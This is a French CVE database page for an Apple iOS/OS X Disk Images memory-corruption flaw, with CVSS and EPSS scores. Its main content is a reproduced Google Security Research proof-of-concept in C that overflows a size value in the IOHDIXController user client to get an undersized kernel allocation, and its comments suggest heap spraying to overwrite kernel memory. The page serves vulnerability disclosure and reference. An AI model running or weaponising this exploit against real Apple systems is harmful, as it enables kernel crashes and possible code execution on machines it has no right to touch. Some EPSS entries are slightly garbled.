CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
The Disk Images component in Apple iOS before 9.1 and OS X before 10.11.1 misparses images, which allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted app.
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
6.8
AV:N/AC:M/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
2.51%
–
–
2022-04-03
–
–
2.51%
–
–
2022-07-17
–
–
2.51%
–
–
2023-02-26
–
–
2.51%
–
–
2023-03-12
–
–
–
0.32%
–
2023-08-20
–
–
–
0.32%
–
2024-02-11
–
–
–
0.32%
–
2024-06-02
–
–
–
0.32%
–
2024-06-30
–
–
–
0.32%
–
2024-08-04
–
–
–
0.32%
–
2024-08-11
–
–
–
0.32%
–
2024-08-25
–
–
–
0.45%
–
2024-09-01
–
–
–
0.45%
–
2024-09-08
–
–
–
0.45%
–
2024-09-22
–
–
–
0.45%
–
2024-09-29
–
–
–
0.34%
–
2024-11-17
–
–
–
0.45%
–
2024-12-22
–
–
–
0.41%
–
2025-03-02
–
–
–
0.82%
–
2025-01-19
–
–
–
0.41%
–
2025-03-09
–
–
–
0.82%
–
2025-03-18
–
–
–
–
7.28%
2025-03-18
–
–
–
–
7.28,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2016-01-27 23h00 +00:00 Auteur : Google Security Research EDB Vérifié : Yes
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=511
Method 5 of the IOHDIXController user client is createDrive64. This takes a 0x100 byte structure input from which it reads a userspace pointer and a size which it passes to IOHDIXController::convertClientBuffer. This wraps the memory pointed to by the userspace pointer in an IOMemoryDescriptor then takes the user-provided size, casts it to a 32-bit type and adds one. It passes that value to IOMalloc. By passing a size of 0xffffffff we can cause an integer overflow and IOMalloc will be passed a size of 0.
IOMalloc falls through to kalloc which will quite happily make a 0-sized allocation for us and return a valid, writable kernel heap pointer.
The original size we specified, cast to a 32-bit type but withone one added to it is then passed as the size of the target buffer in the call to IOMemoryDescriptor::readBytes which attempts to read from the wrapped userspace memory into the undersized kernel heap buffer.
It actually tries to use some fancy DMA stuff to do that copy and this PoC will almost certainly fail and kernel panic somewhere inside that DMA code as there probably aren't valid page-table entries for the whole destination range. But some kalloc heap spraying should take care of that allowing us to actually overwrite stuff :)
*/
/* ianbeer
clang -o iohdix iohdix.c -framework IOKit
Integer Overflow in IOHDIXControllerUserClient::convertClientBuffer leading to undersized kalloc allocation passed to DMA code
Method 5 of the IOHDIXController user client is createDrive64. This takes a 0x100 byte structure input from which it reads
a userspace pointer and a size which it passes to IOHDIXController::convertClientBuffer. This wraps the memory pointed to
by the userspace pointer in an IOMemoryDescriptor then takes the user-provided size,
casts it to a 32-bit type and adds one. It passes that value to IOMalloc. By passing a size of 0xffffffff we can
cause an integer overflow and IOMalloc will be passed a size of 0.
IOMalloc falls through to kalloc which will quite happily make a 0-sized allocation for us and return a valid, writable kernel
heap pointer.
The original size we specified, cast to a 32-bit type but withone one added to it is then passed as the size of the target buffer
in the call to IOMemoryDescriptor::readBytes which attempts to read from the wrapped userspace memory into the undersized
kernel heap buffer.
It actually tries to use some fancy DMA stuff to do that copy and this PoC will almost certainly fail somewhere inside that DMA code
as there probably aren't valid page-table entries for the whole destination range. But some kalloc heap spraying should take care of
that allowing us to actually overwrite stuff :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <IOKit/IOKitLib.h>
int main(){
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching("IOHDIXController");
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 0, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}else{
printf("got userclient connection: %x, type:%d\n", conn, 0);
}
printf("got userclient connection: %x\n", conn);
void* mem = malloc(0x100000000);
uint64_t msg[0x100/8] = {0};
msg[0] = 0xbeeffeed; // +0x00
msg[1] = (uint64_t)mem;
msg[2] = 0xffffffff; // +0x10
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
//char inputStruct[4096];
//size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 4;
// create a queue
err = IOConnectCallMethod(
conn,
0x5,
inputScalar,
inputScalarCnt,
msg,
0x100,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
return 0;
}
return 0;
}